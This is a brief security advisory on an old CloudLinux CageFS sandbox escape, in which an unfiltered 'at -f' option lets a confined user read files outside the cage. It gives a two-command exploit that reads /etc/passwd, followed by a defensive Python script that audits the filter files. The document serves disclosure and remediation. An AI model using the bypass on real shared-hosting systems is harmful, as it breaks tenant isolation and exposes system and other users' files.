Vulnerability

Affected software: CloudLinux CageFS, unknown version (old vulnerability from around 2016; I no longer have the original report)

CloudLinux CageFS can be bypassed by running at with the -f parameter pointing to a file to read and then displaying the job contents.

The at -f argument is not filtered by proxyexec before at is executed outside CageFS, allowing a user inside CageFS to read files outside CageFS.

Exploit

$ at -f /etc/passwd 00:00
$ at -c JOB_NUMBER

Solution

Update CageFS to an unaffected version. Check whether the -f parameter is filtered in /etc/cagefs/filters/at*.json.
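
The filter check above can be scripted. The following is an added example, not part of the original report and not CloudLinux code. It assumes the filter files are JSON objects keyed by "default" or a binary path, with "deny", "allow" and "restrict_path" option lists; confirm those key names against your installed files. The sample configurations are constructed.

```python
import glob
import json

# Assumed schema (check against your installed files): a JSON object whose
# keys are "default" or a binary path, each mapping to a section that may
# hold "deny", "allow" and "restrict_path" lists of options.

def option_status(section, opt="-f"):
    """Classify how one filter section treats opt."""
    if opt in section.get("deny", []):
        return "denied"
    if opt in section.get("restrict_path", []):
        return "path-restricted"
    if "allow" in section and opt not in section["allow"]:
        return "denied"  # allow-list present and opt is not on it
    return "unfiltered"

def audit_filter(config, opt="-f"):
    """Return {section name: status} for every section in one filter file."""
    if not isinstance(config, dict):
        return {}
    return {name: option_status(sec, opt)
            for name, sec in config.items() if isinstance(sec, dict)}

def audit_files(pattern="/etc/cagefs/filters/at*.json"):
    """Audit every filter file matching the path named in the advisory."""
    results = {}
    for path in sorted(glob.glob(pattern)):
        try:
            with open(path) as fh:
                results[path] = audit_filter(json.load(fh))
        except (OSError, ValueError) as exc:  # unreadable or invalid JSON
            results[path] = {"<file>": f"error: {exc}"}
    return results

# Constructed samples, not taken from a real CageFS installation.
WEAK = {"/usr/bin/at": {"deny": ["-m"]}}
DENY = {"/usr/bin/at": {"deny": ["-f"]}}
RESTRICT = {"default": {"restrict_path": ["-f"]}}
ALLOWLIST = {"/usr/bin/at": {"allow": ["-l", "-c", "-d"]}}

if __name__ == "__main__":
    found = audit_files()
    if not found:
        print("no filter file matched /etc/cagefs/filters/at*.json")
    for path, sections in found.items():
        for name, status in sections.items():
            print(f"{path} [{name}]: -f is {status}")
```

Any section reported as "unfiltered", and the case where no filter file matches at all, should be reviewed by hand.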

Timeline

Unknown (old vulnerability from around 2016; I no longer have the original report; it was fixed around 2016).